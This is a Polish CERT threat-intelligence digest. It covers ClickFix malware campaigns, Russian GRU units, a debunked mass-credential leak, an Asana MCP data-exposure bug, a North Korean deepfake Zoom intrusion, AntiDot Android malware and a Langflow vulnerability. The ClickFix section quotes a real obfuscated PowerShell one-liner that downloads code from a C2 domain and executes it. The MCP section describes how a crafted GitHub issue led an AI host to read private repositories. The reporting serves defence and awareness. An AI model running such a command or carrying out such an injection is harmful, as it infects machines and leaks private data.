Krajobraz zagrożeń 16/06-22/06/25

cert.orange.pl 21 godzin temu

Początek lata i długi weekend to dla wielu czas odpoczynku, ale w świecie cyberzagrożeń nie brakowało w tym czasie interesujących zdarzeń oraz publikacji. Przyjrzeliśmy się analizie nowego złośliwego systemu na urządzenia mobilne, zagrożeniom wiążącym się z szerokim wykorzystaniem sztucznej inteligencji i nowym informacjom o metodach grup APT. Nagłówki nie dały zapomnieć o cyberbezpieczeństwie, przede wszystkim przez doniesienia o gigantycznym wycieku, ale jak wiadomo nie warto ufać nagłówkom, więc podzieliliśmy się naszą perspektywą i na ten głośny temat. O tym co jeszcze warto wiedzieć by być lepiej przygotowanym na aktualne zagrożenia przeczytacie w naszym krajobrazie.

Na skróty:

Temat tygodnia: Kampanie ClickFix w czterech smakach.
Zaawansowane zagrożenia: Cybernetyczna Rosja: APT28, Sandworm i Jednostka 29155 jako narzędzia wojny hybrydowej.
Cybercrime: 'Wyciek’ 16 miliardów poświadczeń, którego nie było.
Future: Ekspozycja danych przez protokół MCP Asany.
Oszustwa i podszycia: Deepfake phishing w Zoomie w kampaniach grupy TA444.
Cyberwar: Rosyjski operator telekomunikacyjny celem ukraińskiego ataku.
Złośliwe oprogramowanie: AntiDot – nowy malware na urządzenia mobilne.
CVE Tygodnia: CVE-2025-3248: od krytycznej podatności w Langflow do botnetu.

Temat tygodnia

Kampanie ClickFix w czterech smakach

Technika ClickFix była szeroko opisywana w różnych scenariuszach, począwszy od dystrybucji w reklamach w social mediach po przejęte strony, poprzez kampanie ransomware aż po zastosowania przez grupy APT.

W tym tygodniu przyjrzeliśmy się czterem kampaniom wykorzystującym technikę ClickFix do dystrybucji złośliwego oprogramowania.

Pierwsza z kampanii dotykała użytkowników z Niemiec i dostarczała oprogramowanie AsyncRAT na zainfekowane stacje. Wektor początkowy infekcji rozpoczynał się na stronie z typowym oknem do weryfikacji reCAPTCHA i komendą do wykonania w ramach terminala systemu Windows. Kopiowana komenda nie była obfuskowana; miała za zadanie pobrać payload ze zdalnego serwera i zdekodować go jako string.

Dostarczany payload był już obfuskowany, pozwalał na utrzymanie dostępu w systemie poprzez modyfikację wartości kluczy rejestru zapewniając stałe wykonywanie się skryptu Powershella przy uruchomieniu systemu lub ponownym logowaniu. Docelowa część payloadu miała za zadanie uruchomić kod C# w pamięci, który łączył się z serwerem C2 na port 4444 TCP.

Druga kampania również wymuszała fałszywą weryfikację na użytkowniku, podszywając się pod zabezpieczenia Cloudflare, ale posiadała bardziej złożoną metodę infekcji złośliwym oprogramowaniem.

Komenda Powershellowa była obfsukowana, co znacząco utrudnia rozpoznanie czy dana komenda jest złośliwa, jeżeli użytkownik wcześniej nie słyszał o kampanii z użyciem ClickFix.

„C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe” -nOp -w h -C „$rb”l”d30 = 'cmb”k”z”8kz1″0″0″01″0″8k2″ca”rj”ew”z”f.inf”o’; $v”nr”l”01″ = Invo”k”e”-„RestM”e”th”o”d -Uri $rb”l”d”3″0; I”nvo”k”e-E”xp”ress”i”o”n $v”n”r”l0″1”

W istocie celem powyższej komendy jest wysłanie żądania HTTP/HTTPS do zdefiniowanej domeny C2 i wykonania odpowiedzi od serwera jako kodu dzięki metody Powershella Invoke-Expression. Payload dostarczany na stację zawierał kilka warstw obfuskacji, a w kilku krokach sprowadzał się do:

Dodania wyjątku dla ścieżki Temp w Windows Defenderze.
Uruchomienia procesu PowerShella z uprawnieniami administratora.
Sprawdzania w pętli, czy użytkownik zaakceptował okno kontroli konta użytkownika do uruchomienia PS z uprawnieniami administratora.

Jeśli użytkownik kliknął ‘Tak’, skrypt pobiera plik .bat do wcześniej wykluczonego folderu Temp i ustawia skrót do pobranego pliku w aplikacjach startowych dla zapewnienia persystencji.

W kolejnych etapach, dalsza część kodu wykonuje kod .NET z pamięci, a plik .bat komunikuje się z serwerem C2 pozwalając na wykonywanie komend w pamięci ofiary.

Samo złośliwe oprogramowanie zostało nazwane LightPerlGirl ze względu na obecność stringa o tej nazwie w kodzie, a użyty język rosyjski w logach z serwerem C2 może wskazywać na pochodzenie rosyjskojęzycznego threat actora.

W innej kampanii opisywanej przez Elastic Security Labs mieliśmy do czynienia z bardziej zaawansowaną kampanią wykorzystującą standardową weryfikację fakeCAPTCHA do dostarczenia multi-stage loadera GHOSTPULSE, a następnie stealera SectopRAT. O tym duecie wspominaliśmy na łamach naszego bloga w kontekście kampanii na fałszywe narzędzie AnyDesk, tym razem widzimy go w scenariuszu ClickFix.

Kampania rozpoczyna się od scenariusza z weryfikacją fałszywą weryfikacją CloudFlare, z tekstem, który dodatkowo wprowadza użytkownika w błąd „Verify you are human – Cloudflare Verification ID: 7702”.

W rzeczywistości strona jest mocno obfuskowanym Javascriptem, który generuje kod HTML i kopiuje kod PowerShella zakodowany w base64 do schowka. Pierwszy Powershell pobiera skrypt PowerShella z innej strony, który dostarcza plik ComponentStyle.zip na stację. W archiwum znajduje się nieszkodliwy plik wykonywalny Crysta_X64.exe wraz z złośliwym plikem DllXDownloadManager.dll – oba pliki służą do wykonania DLL sideloadingu. Oprócz wspomnianych plików mamy w archiwum mamy także plik IDAT (Heeschamjet.rc) oraz Shonomteak.bxi – są zaszyfrowane i używane w dwóch etapach infekcji GHOSTPULSE wraz z dostarczeniem konfiguracji.

GHOSTPULSE w trzech krokach ładuje stealera ARECHCLIENT2:

Patchuje AMSI przez API hooking, aby stealer nie był wykrywany przez mechanizm AMSI.
Ekstraktuje i deszyfruje payload stelaera.
Za pomocą funkcji API Windowsa (CLRCreateInstance) .NET CLR jest ładowany do pamięci przed zastosowaniem techniki reflective loading do uruchomienia ARECHCLIENT2 bezpośrednio w pamięci.

Infostealer ARECHCLIENT2 pozwala na eksfiltrację danych z portfeli kryptowalut, haseł i ciasteczek z przeglądarek oraz poświadczeń do FTP, VPN, Telegrama, Discorda, Steama wraz z danymi systemowymi. Dodatkowo pozwala na wykonywanie komend łącząc się z serwerem C2 (mając również dodatkowy serwer C2 w zapasie).

Kampania ClickFIix nie omija również polskich stron, na których umieszczane są fałszywe weryfikacje reCAPTCHy Cloudlfare.

W tym scenariuszu mieliśmy do czynienia również ze złożonym łańcuchem infekcji ClickFix. Użytkownik po kliknięciu w reCAPTCHę był kierowany do instrukcji obrazkowej, do uruchomienia złośliwego kodu. Infekcja była podzielona na trzy etapy, w których poprzez zaciemnione skrypty Powershell’a, dostarczany i uruchamiany był infostealera Vidar (również znanego już naszym czytelnikom). Głównym zadaniem Vidara jest kradzież szerokiego zakresu danych osobistych i poufnych, w tym danych logowania do serwisów internetowych, historii przeglądania (w tym z przeglądarki Tor), plików cookie, haseł, danych kart kredytowych, portfeli kryptowalutowych, a także informacji z systemu do uwierzytelniania dwuskładnikowego i wiadomości tekstowych. Vidar posiada modułową architekturę, co pozwala operatorom na dostosowywanie jego funkcji do konkretnych celów. Po infekcji Vidar łączy się z serwerem Command and Control (C2), często ukrytym w profilach na platformach społecznościowych – w tym przypadku była to platforma Steam. Malware ten jest jednym ze starszych działających w modelu Malware-as-a-Service. Fakt wykorzystania metody ClickFix do dystrybucji wskazuje na to, iż twórcy na bieżąco monitorują potencjalne skuteczne wektory docierania do swoich ofiar. Z dużą pewnością można odseparować techniki dostarczania złośliwego systemu od samego rodzaju końcowego malware. ClickFix to kolejna uniwersalna metoda, która bardzo sprzyja dostarczeniu wielu różnych złośliwych payload’ów.

Więcej informacji:
https://cert.orange.pl/aktualnosci/analiza-kampanii-ghostpulsesectoprat
https://www.cloudsek.com/blog/fileless-asyncrat-distributed-via-clickfix-technique-targeting-german-speaking-users
https://www.todyl.com/blog/threat-advisory-lightperlgirl-malware
https://www.elastic.co/security-labs/a-wretch-client/

Wybrane zagrożenia tygodnia

Zaawansowane zagrożenia

Cybernetyczna Rosja: APT28, Sandworm i Jednostka 29155 jako narzędzia wojny hybrydowej

Współczesne cyberzagrożenia nie są już wyłącznie domeną cyberprzestępców – są integralnym narzędziem geopolityki. W swoich najnowszych raportach dotyczących jednostek cybernetycznych rosyjskich służb specjalnych, analitycy firmy Treadstone 71, pokazują jak skutecznie Kreml łączy cyberataki, sabotaż, dezinformację i nadzór wewnętrzny w spójną strategię cyfrowej dominacji. U podstaw tego systemu leżą trzy najważniejsze formacje GRU – APT28 (Fancy Bear), APT44 (Sandworm) oraz Jednostka 29155 – wspierane przez system cyberobrony GosSOPKA. Razem tworzą zintegrowaną machinę do prowadzenia wojny hybrydowej: fizycznej, cyfrowej, informacyjnej i psychologicznej. Elementy te, choć formalnie oddzielne, wspólnie odzwierciedlają sposób, w jaki Federacja Rosyjska realizuje swoją strategię cyfrowej dominacji i suwerenności informacyjnej.

Unit 26165 – APT28 / Fancy Bear – filar cyberofensywy

APT28 to jednostka podległa GRU, znana z prowadzenia globalnych kampanii szpiegowskich i wpływu informacyjnego. Jej działania obejmują włamania do sieci rządowych, ataki phishingowe, eksfiltrację danych, manipulację informacjami i operacje wpływu. Przykłady to włamania do Bundestagu, DNC, WADA, i rozległe operacje przeciw Ukrainie. APT28 stosuje zaawansowane exploity (np. CVE-2023-23397), rootkity UEFI (LoJax) i malware takie jak X-Agent czy Zebrocy.
Grupa wykazuje dużą elastyczność w dostosowywaniu TTPs (taktyki, techniki, procedury), operuje na wielu poziomach – od ataków technicznych po psychologiczną dezinformację. Kluczowa jest jej zdolność do działań skoordynowanych z interesami polityki zagranicznej Rosji, w szczególności w kontekście NATO i konfliktu z Ukrainą.

Unit 274455 – APT 44 / Sandworm

Sandworm, to najbardziej agresywny i destrukcyjny komponent cyberarmii GRU. Skupia się nie na szpiegostwie, ale także na niszczeniu systemów i paraliżowaniu infrastruktury krytycznej. To właśnie ta grupa stała za atakami na ukraińską sieć energetyczną (2015, 2016), wykorzystaniem NotPetya (2017), która wyrządziła globalne szkody finansowe przekraczające 10 miliardów dolarów, zakłóceniem Igrzysk Olimpijskich w Pjongczangu (2018), oraz atakami na infrastrukturę NATO i państw bałtyckich.

Sandworm wykorzystuje złośliwe oprogramowanie do sabotażu systemów SCADA i OT (np. Industroyer, BlackEnergy), a także narzędzia do czyszczenia danych i malware klasy wiper. Często operuje pod osłoną fałszywych tożsamości (np. „CyberArmyofRussia_Reborn”), aby utrudnić atrybucję i zastraszyć ofiary.
Grupa ta jest kluczowa dla rosyjskiej strategii cybernetycznego rażenia infrastruktury wroga w czasie wojny lub kryzysu – jako cyfrowa artyleria w wojnie hybrydowej.

Unit 29155 – hybrydowa groźba nowej generacji

Unit 29155, choć mniej znana od APT28, odpowiada za najbardziej ryzykowne, tajne operacje: fizyczne sabotaże, zamachy (np. Skripal, Gebrev), destabilizację polityczną (próba przewrotu w Czarnogórze), jak i cyberataki (np. WhisperGate, ataki na Estonię). Raport podkreśla ewolucję tej jednostki – od typowej jednostki specjalnej do zespołu prowadzącego operacje hybrydowe: łączenie sabotażu, cyberszpiegostwa i działań wpływu.

Cyberkomponent tej jednostki jest młodszy i mniej dojrzały niż u APT28, a mimo to przypisuje się mu znaczące działania, np. zhakowanie Qatar National Bank. Struktura jednostki pokazuje powiązania z cyberprzestępczością (rekrutacja carderów, użycie narzędzi z dark webu), problemy z kompetencjami, korupcją i bezpieczeństwem operacyjnym. Jednocześnie właśnie ta „niedoskonałość” może działać na korzyść – maskując działania jako amatorskie lub niemające związku z państwem.

Jednostka ta coraz częściej wykorzystuje ataki finansowe i prowadzi kampanie wpływu przez fałszywe tożsamości i dziennikarzy (np. persona „Anonymous Poland” czy manipulacje przez ArmsWatch.com).

GosSOPKA – państwowy nadzór pod przykrywką cyberobrony

GosSOPKA to system ochrony rosyjskiej infrastruktury krytycznej przed atakami cyfrowymi, formalnie podległy FSB. W teorii służy detekcji i neutralizacji incydentów, ale w praktyce jego architektura pozwala na pełną centralizację nadzoru cyfrowego – łącznie z przymusowym raportowaniem i zastępowaniem technologii zachodnich krajowymi zamiennikami (często o niższej jakości). Braki kadrowe, zaufania i technologiczne obniżają jego realną skuteczność, mimo rosnącego zasięgu. System ten jest mocno zintegrowany z ideą „Suwerennego Runetu”, czyli planu uniezależnienia rosyjskiej przestrzeni cyfrowej od reszty świata. Obawy o jego użycie jako narzędzia represji wewnętrznej są uzasadnione – system zbiera ogromne ilości danych, które mogą być używane do identyfikacji opozycji, kontroli biznesu i tłumienia niezależnych podmiotów.

Opisane jednostki tworzą skoordynowany system, który umożliwia Rosji prowadzenie wojny hybrydowej na wielu poziomach – od sabotażu i dezinformacji po finansowe osłabianie Zachodu. Taka architektura wymaga reakcji wykraczającej poza klasyczne ramy cyberbezpieczeństwa. Jako cyberobrońcy musimy patrzeć na rosyjską cyberstrategię jako kompleksowy system działań ofensywnych i defensywnych, zintegrowanych na poziomie politycznym i wojskowym. Ataki są prowadzone przez różne grupy, ale służą temu samemu celowi: destabilizacji przeciwnika przy jednoczesnej ochronie własnej infrastruktury i propagandy.
Działania defensywne muszą obejmować:

wzmocnienie odporności infrastruktury krytycznej (szczególnie OT/SCADA),
monitorowanie fałszywych narracji i operacji wpływu,
śledzenie sieci finansowania operacji cyfrowych,
ofensywną cyberobronę (m.in. zakłócanie C2),
oraz budowanie odporności informacyjnej społeczeństw.

W konfrontacji z rosyjskim adwersarzem nie chodzi już tylko o bezpieczeństwo danych, chodzi o zyskanie sytuacyjnej przewagi cyfrowej przez co zapewnieniw bezpieczeństwa państw.

Więcej informacji:
https://www.treadstone71.com/index.php/unit-29155-apt28-gossopka

Cybercrime

’Wyciek’ 16 miliardów poświadczeń, którego nie było

Ubiegły tydzień objawił się kolejnym głośnym tytułem “16 billion passwords exposed in record-breaking data breach, opening access to Facebook, Google, Apple, and any other service imaginable”. Nieco przerażeni skalą problemu postanowiliśmy przyjrzeć się temu tematowi. Czy rzeczywiście coś wyciekło, czy było rekodowe i o co chodzi.

Źródłem ujawnionych danych miały być różne złośliwe systemu typu infostealer, które wykradły dane z setek tysięcy zainfekowanych urządzeń. Autorzy twierdzą, iż dane są „świeże” i nie pochodzą z wcześniej znanych incydentów. Wśród usług, których dotyczyły rekordy, wymienia się takie giganty jak Apple, Google, Facebook, GitHub czy Telegram. Artykuł nie mówi o żadnym konkretnym włamaniu, a jedynie o agregacji danych dostępnych chwilowo przez niezabezpieczone chmurowe zasoby, które zostały zauważone przez analityków.

Choć skala wycieku jest ogromna i “potwierdzona przez badaczy” Cybernews, to nie jest to nowy, pojedynczy wyciek z konkretnego serwisu, ale kompilacja danych z wielu wcześniejszych naruszeń i infekcji malwarem. Nie doszło do bezpośredniego włamania do takich serwisów jak Apple czy Google. Niestety, po dokładniejszej analizie dostępnych faktów i komentarzy ze środowiska bezpieczeństwa informacji, okazuje się, iż artykuł Cybernews wprowadza w błąd. Większość, jeżeli nie wszystkie dane w tej „kompilacji”, pochodzi z wcześniejszych wycieków takich jak RockYou2024 czy Collection#1, a więc nie stanowi żadnego nowego incydentu bezpieczeństwa. Cała narracja została zbudowana wokół starych i wtórnie agregowanych danych, które były już wielokrotnie analizowane w przeszłości.

Twierdzenia o 16 miliardach rekordów są rażącą manipulacją liczbami. Sumowanie ogromnych baz danych bez usunięcia duplikatów i bez analizy unikalności rekordów nie jest żadnym miarodajnym wskaźnikiem skali zagrożenia. Eksperci z Hudson Rock oraz portale takie jak BleepingComputer i DataBreaches.net zgodnie stwierdzają, iż nie mamy do czynienia z żadnym realnym wyciekiem – ani nowym, ani wyjątkowym pod względem skali. Całość wygląda raczej na próbę wywołania szumu medialnego i kliknięć niż rzetelną analizę incydentu. Tego typu publikacje, oparte na powielaniu sensacyjnych tytułów i niezweryfikowanych informacji, szkodzą całej branży cyberbezpieczeństwa. Odbiorcy mogą mieć wrażenie, iż zagrożenia są poza ich kontrolą, a skala wycieków rośnie w sposób niepowstrzymany.

Warto jednak zauważyć, iż niezależnie od wątpliwej wartości sensacyjnych doniesień medialnych, faktycznie trwa stała i rosnąca kampania przestępcza oparta na wykorzystaniu złośliwego systemu typu infostealer. Cyberprzestępcy regularnie infekują urządzenia końcowe użytkowników indywidualnych i firmowych, by pozyskiwać dane uwierzytelniające do najróżniejszych systemów – od serwisów społecznościowych i skrzynek pocztowych, po panele administracyjne i konta VPN. Dla atakujących to znacznie prostsza i tańsza metoda niż bezpośrednie włamywanie się do dobrze zabezpieczonych systemów z ochroną klasy korporacyjnej. Pozyskane hasła mogą być później wykorzystywane do ataków typu credential stuffing lub do uzyskania dostępu w ramach tzw. initial access.

Dlatego tak istotne jest, aby użytkownicy indywidualni korzystali z wieloskładnikowego uwierzytelniania (MFA) zawsze, gdy tylko jest to możliwe. Z kolei administratorzy systemów powinni iść krok dalej i stosować dodatkowe warstwy zabezpieczeń, takie jak ograniczenia oparte na tożsamości urządzenia czy geolokalizacji. Przykładowo, wdrożenie mechanizmów typu hybrid join pozwala wymusić logowanie tylko z określonych, wcześniej zarejestrowanych komputerów i lokalizacji, co znacznie utrudnia wykorzystanie skradzionych danych uwierzytelniających. Tego typu działania nie tylko chronią przed skutkami działania infostealerów, ale też ograniczają powierzchnię ataku w razie ewentualnego naruszenia danych.

Więcej informacji:
https://cybernews.com/security/billions-credentials-exposed-infostealers-data-leak/

Future

Ekspozycja danych organizacji przez protokół MCP Asany

Pojęcie Model Context Protocol (MCP) znajduje się w tej chwili na fali popularności, ze względu na możliwość szerokich zastosowań w systemach opartych na AI.
Sama architektura protokołu MCP polega na relacji host-klient-serwer:

Hostem MCP może być aplikacja, chatbot, który może korzystać z zewnętrznych narzędzi lub źródeł danych.
Klientem MCP jest w tym wypadku moduł, który przekazuje żądania od Hosta do odpowiednich serwerów MCP.
Serwer MCP to usługa, która udostępnia narzędzia lub dane według określonego standardu MCP, przykładowo dane z konkretnego projektu w organizacji w Asanie.

MCP upraszcza i definiuje w jaki sposób aplikacja oparta na AI ma komunikować się z narzędziami i źródłami danych unifikując integracje dla wszystkich podłączanego elementu. Sama komunikacja opiera się na standardzie JSON-RPC 2.0.

Zagrożenia związane z MCP skupiają się na samych błędach w implementacji serwerów MCP np.: określając większe uprawnienia dla Klientów niż pierwotne zamierzono. Przykładem jest błąd w serwerze MCP dla Githuba. Utworzenie odpowiedniego issue w publicznym repozytorium danego autora, a następnie przetworzenie go przez Hosta podłączonego do serwera MCP pozwalało na odczyt prywatnych repozytoriów w obrębie tego samego profilu.

Asana uruchomiła usługę serwera MCP 1 maja 2025. Czwartego czerwca 2025 wykryto bug związany z jej implementacją i wyłączono serwer MCP Asany. Kilka dni później poinformowano klientów dotkniętych błędem.

W przypadku serwera MCP Asany bug pozwalał chatbotom z zadanej organizacji zaglądać w projekty, zespoły i zadania innych innej organizacji, choćby jeżeli nie miałyby przyznanego do nich żadnego dostępu. Użytkownik widział jednak tyle na ile pozwalał mu zakres uprawnień MCP jako Klienta MCP, czyli np.: mógł odczytywać dane, ale nie mógł ich edytować czy usuwać.

Firma Asana poinformowała, iż błąd w serwerze MCP został rozwiązany, a klienci mogą podejrzeć logi i metadane związane z Klientami MCP celem weryfikacji, czy faktycznie doszło do ekspozycji danych.

W przypadku implementacji serwerów MCP zalecamy weryfikowanie uprawnień przydzielanych użytkownikom. Istotna jest również sama weryfikacja serwerów MCP pod względem wiarygodności certyfikatów TLS, metod uwierzytelnienia i autoryzacji (w szczególności warto korzystać z serwerów z implementacją OAuth 2.0 lub PAT) i dostępnych funkcji oraz zadeklarowanych uprawnień przed wdrażaniem ich w systemach. Z serwerami MCP należy postępować podobnie jak w przypadku korzystania z bibliotek Pythona i obrazów Dockera aby uchronić się backdoorami pozostawionymi w niesprawdzonych elementach. Ze względu na szybkość zmian i usprawnień wprowadzanych w świecie AI miejmy na względzie ryzyka wynikające ze stosowania nowych i często niesprawdzonych technologii.

Więcej informacji:
https://www.upguard.com/blog/asana-discloses-data-exposure-bug-in-mcp-server
https://simonwillison.net/2025/May/26/github-mcp-exploited/

Oszustwa i podszycia

Deepfake phishing w Zoomie w kampaniach grupy TA444

Analitycy firmy Huntress przygotowali analizę ataku przeprowadzonego przez północnokoreańską grupę BlueNoroff (część grupy Lazarus, znaną również jako TA444, Sapphire Sleet czy COPERNICIUM), wymierzonego w środowisko Web3 i użytkowników Chromebooków z systemem macOS. Analiza przedstawia cały łańcuch ataku – od operacji socjotechnicznych po szczegóły techniczne i funkcjonalności złośliwego oprogramowana dostarczanego na urządzenia końcowe.

Opisany atak rozpoczynał się od wiadomości przesłanej przez Telegram, w której atakujący udawali partnera biznesowego i wysłali zaproszenie na spotkanie. Link do Calendly, rzekomo prowadzący na Google Meet, w rzeczywistości przenosił użytkownika na spreparowaną domenę Zoom. Uczestnik dołączał do spotkania z generowanymi deepfake’ami kadry zarządzającej, co nadawało całemu scenariuszowi pozór autentyczności. Gdy użytkownik zgłaszał problemy z mikrofonem, otrzymywał sugestię zainstalowania specjalnej wtyczki Zoom, co zapoczątkowywało proces infekcji. Wspomniana wtyczka okazała się AppleScriptem (zoom_sdk_support.scpt), który początkowo otwierał oficjalną stronę Zoom SDK, a następnie pobierał złośliwy shell script. Skrypt wyłączał historię Bash, potwierdzał obecność i w razie potrzeby instalował Rosetta 2 – warstwę translacyjną Apple pozwalającą na uruchamianie plików binarnych skompilowanych dla architektury x86_64 na urządzeniach z układem Apple Silicon. Instalacja Rosetta była kluczowa, ponieważ wiele komponentów malware’u było właśnie skompilowanych w tej architekturze, co umożliwiało atakującym pełne wykorzystanie implantu niezależnie od typu procesora ofiary. Po instalacji Rosetty, skrypt pobierał główny payload do katalogu /tmp/icloud_helper, wyświetlał okno proszące o hasło systemowe użytkownika, a następnie usuwał historię poleceń w celu zatarcia śladów swojej obecności.

Analiza uwidoczniła osiem plików binarnych zaangażowanych w kolejne etapy infekcji, między innymi:

Telegram 2 – loader napisany w języku Nim, działający jako usługa LaunchDaemon i zapewniający przetrwanie infekcji po restarcie,
Root Troy V4 – backdoor w Go umożliwiający pobieranie kolejnych komponentów,
InjectWithDyld – loader C++ odpowiedzialny za szyfrowanie i wstrzykiwanie payloadów do docelowych procesów z użyciem uprawnień com.apple.security.get-task-allow,
XScreen – keylogger w Objective-C umożliwiający rejestrację naciśnięć klawiszy, zawartości schowka i zrzutów ekranu,
CryptoBot – stealer w Go odpowiedzialny za pozyskiwanie danych portfeli kryptowalutowych.

Każdy komponent działał w precyzyjnej sekwencji: Telegram 2 inicjował infekcję, Root Troy pobierał i aktywował kolejne moduły z użyciem AppleScripta, a InjectWithDyld odszyfrowywał i wstrzykiwał payloady do innych procesów. Istotną rolę w omijaniu detekcji odgrywał mechanizm sprawdzania stanu wyświetlacza – malware wykrywał, czy ekran jest aktualnie aktywny. jeżeli nie – infekcja kontynuowała działanie, natomiast gdy wykrywano aktywność użytkownika, malware wstrzymywał swoją prace, unikając tym samym zwrócenia uwagi na niepożądane procesy czy okna systemowe. XScreen i CryptoBot działały równolegle, umożliwiając kradzież poświadczeń i informacji: zrzutów ekranu, danych ze schowka, ciasteczek przeglądarki, haseł, danych kont oraz plików portfeli kryptowalutowych. Wszystkie dane były eksfiltrowane do serwera Command and Control (C2) poprzez połączenia HTTPS lub WebSocket, zapewniający tunelowanie złośliwego ruchu w sposób trudniejszy do adekwatnej identyfikacji.

Kampania BlueNoroff potwierdza zdolność tej grupy do wykorzystywania zaawansowanej inżynierii społecznej, deepfake’ów, fałszywych rozszerzeń oraz wieloetapowych implantów – każdy krok zaprojektowany został tak, by nadużyć zaufanie ofiary i przeprowadzić zaawansowaną infiltrację przejętego systemu. Jest to ewolucja metod używanych przez grupę Lazarus, szczególnie adaptacja strategii stosowanych wcześniej w kampaniach Contagious Interview i ClickFake Interview, które opisywaliśmy we wcześniejszych Krajobrazach Zagrożeń. Najważniejsze wnioski tej analizy wskazują, iż w środowisku Web3 atakujący koncentrują się na użytkownikach zarządzających kryptowalutami, co łączy motyw finansowy z techniczną i operacyjną złożonością. Niezbędne staje się zwiększenie czujności w stosunku do niespodziewanych zaproszeń na spotkania i rozszerzeń w zaufanych aplikacjach, a także wdrożenie mechanizmów monitorowania zachowań stacji końcowych na poziomie interakcji użytkownika oraz wykorzystywanych bibliotek systemowych. Ta kampania stanowi ostrzeżenie przed rosnącym poziomem profesjonalizacji działań APT: od deepfake’ów á la Google Meet i Zoom, przez skrypty instalujące Rosetta 2, aż po skomplikowaną sieć złośliwych plików binarnych. Użytkownicy i organizacje muszą mieć świadomość, iż zagrożenia te coraz częściej podążają równolegle za innowacjami w komunikacji i technologii, co wymaga adekwatnych narzędzi bezpieczeństwa, edukacji i procedur reagowania.

Więcej informacji:
https://www.huntress.com/blog/inside-bluenoroff-web3-intrusion-analysis

Cyberwar

Rosyjski operator telekomunikacyjny celem ukraińskiego ataku

12 czerwca, w Dzień Rosji, ukraiński wywiad wojskowy (HUR) przeprowadził atak na wiodącego operatora telekomunikacyjnego na Syberii – Orion Telecom. KyivPost informuje o wyłączeniu 370 serwerów i około 500 przełączników sieciowych, a także usunięciu danych kopii zapasowych, co ma uniemożliwić szybkie przywrócenie infrastruktury do poprzedniego stanu. Mieszkańcy Krasnojarska, Irkucka, Bracka i Abakanu zgłaszali brak dostępu do telewizji i internetu, ale poza dotkliwymi skutkami dla obywateli, atak miał także wpłynąć na działanie kopalni uranu. Orion Telecom jest jedynym dostawcą usług telekomunikacyjnych dla zamkniętego miasta, w którym znajduje się kopalnia, więc atak według źródeł doprowadził do kompletnego odcięcia miasta od świata. Oficjalnie Orion Telecom poinformował o problemach technicznych wynikających z poważnego ataku DDoS.

Atakowi towarzyszyły wiadomości obrażające Rosję i grożące przywróceniem kraju do „ery kamienia łupanego” pojawiające się w lokalnych grupach na komunikatorze Telegram. Były wysyłane rzekomo przez grupę hakerską z Ukrainy – BO Team. BO Team lub Black Owl, to niezależna grupa hakerska działająca od początku 2024 roku, która już wcześniej atakowała we współpracy z HUR rosyjską infrastrukturę – między innymi system sądownictwa, urząd odpowiedzialny za podpisy cyfrowe i centrum badawcze. Zauważono, iż grupa kieruje się motywacjami charakterystycznymi dla haktywistów, ale sposób ich działania jest rzadko spotykany wśród takich grup. BO Team atakuje tylko cele w Rosji i informuje o nich na Telegramie, ale pozostaje długo w ukryciu po uzyskaniu dostępu do systemów i nie współpracuje z innymi grupami haktywistycznymi. Według Kaspersky grupa jest poważnym zagrożeniem dla Rosji. Na charakterystykę działań może wpływać regularna kooperacja z HUR.

Więcej informacji:
https://www.kyivpost.com/post/54421
https://therecord.media/pro-ukraine-hacker-group-black-owl-major-threat-russia

Złośliwe oprogramowanie

AntiDot – nowy malware na urządzenia mobilne

W zeszłym tygodniu PRODAFT przygotował raport dotyczący AntiDot – relatywnie nowego, złośliwego systemu Android oferowanego w modelu Malware-as-a-Service. AntiDot jest sprzedawany przez podmiot znany jako LARVA-398 i reklamowany jako rozwiązanie „3 w 1”, integrujące własny loader, packer oraz pełną infrastrukturę botnetową, co upraszcza potencjalnym kupującym masowe przeprowadzanie kampanii. Do tej pory wykryto ponad 3 775 zainfekowanych urządzeń w ponad 250 różnych kampaniach. Analiza wskazuje na co najmniej 11 aktywnych serwerów C2, ukrytych przed standardowymi systemami detekcji.

Od strony technicznej AntiDot korzysta z zaawansowanych technik maskowania i zarządzania, w tym dynamicznych domen C2, szyfrowania danych przesyłanych z urządzeń oraz mechanizmów aktualizacji konfiguracji botów w czasie rzeczywistym. Packer stosowany w AntiDot został zaprojektowany w sposób modularny – umożliwia szyfrowanie plików binarnych z użyciem unikalnych kluczy AES dla każdej kampanii, co skutecznie utrudnia analizę i wykrywanie przez oprogramowanie antywirusowe. Co istotne, malware rejestruje się jako usługa działająca w tle i ukrywa swój interfejs przed użytkownikiem. Zintegrowany z malwarem loader, automatycznie ustawia złośliwą aplikację jako domyślną usługę dostępności, co pozwala jej kontrolować wszystkie elementy interfejsu użytkownika. Dzięki temu możliwe jest wyświetlanie fałszywych nakładek ekranowych przypominających aplikacje bankowe czy giełdy kryptowalut. Złośliwy kod przechwytuje również wiadomości SMS, co pozwala atakującym obejść mechanizmy weryfikacji dwuetapowej (2FA/MFA). AntiDot komunikuje się z infrastrukturą Command and Control (C2) dzięki protokołu WebSocket. Kanały komunikacyjne są dynamiczne – operatorzy botnetu mogą dodawać lub zmieniać tzw. „gates” (bramy komunikacyjne) bez konieczności modyfikowania malware’u na urządzeniach ofiar. Proces konfiguracji jest zarządzany z poziomu panelu C2 opartego na frameworku MeteorJS i umożliwia pełną kontrolę nad zainfekowanymi urządzeniami w czasie rzeczywistym. Co więcej, z panelu można uzyskać podgląd w czasie rzeczywistym na ekran ofiary, a także inicjować gesty, monitorować powiadomienia, wiadomości i dane aplikacji.

AntiDot to przykład nowoczesnego narzędzia MaaS, którego zdolności jednoznacznie wskazują na wzrost zaawansowania tego typu narzędzi. Konieczne jest zwiększenie świadomości użytkowników w zakresie ryzyk związanych z instalacją aplikacji spoza oficjalnych źródeł, a także wzmacnianie ochrony przed przechwytywaniem danych SMS i haseł. Systemy bezpieczeństwa powinny analizować anomalie w ruchu HTTPS, szczególnie wobec dynamicznie zmieniających się nazw domen i nietypowych zachowań usług Accessibility.

Więcej informacji:
https://catalyst.prodaft.com/public/report/antidot

CVE tygodnia

CVE-2025-3248: od krytycznej podatności w Langflow do botnetu.

Analitycy TrendMicro zidentyfikowali kampanię wykorzystującą podatność CVE-2025-3248 w Langflow do podłączania serwerów do botnetu Flodrix. Luka CVE-2025-3248 umożliwia nieuwierzytelnionym atakującym zdalne wykonanie kodu. Została wyceniona na 9.8 w skali CVSS i uznano ją za krytyczną. Podatne jest Langflow w wersjach poniżej 1.3.0 i rekomendowaną mitygacją jest niezwłoczna aktualizacja do wersji 1.3.0 lub wyższej.

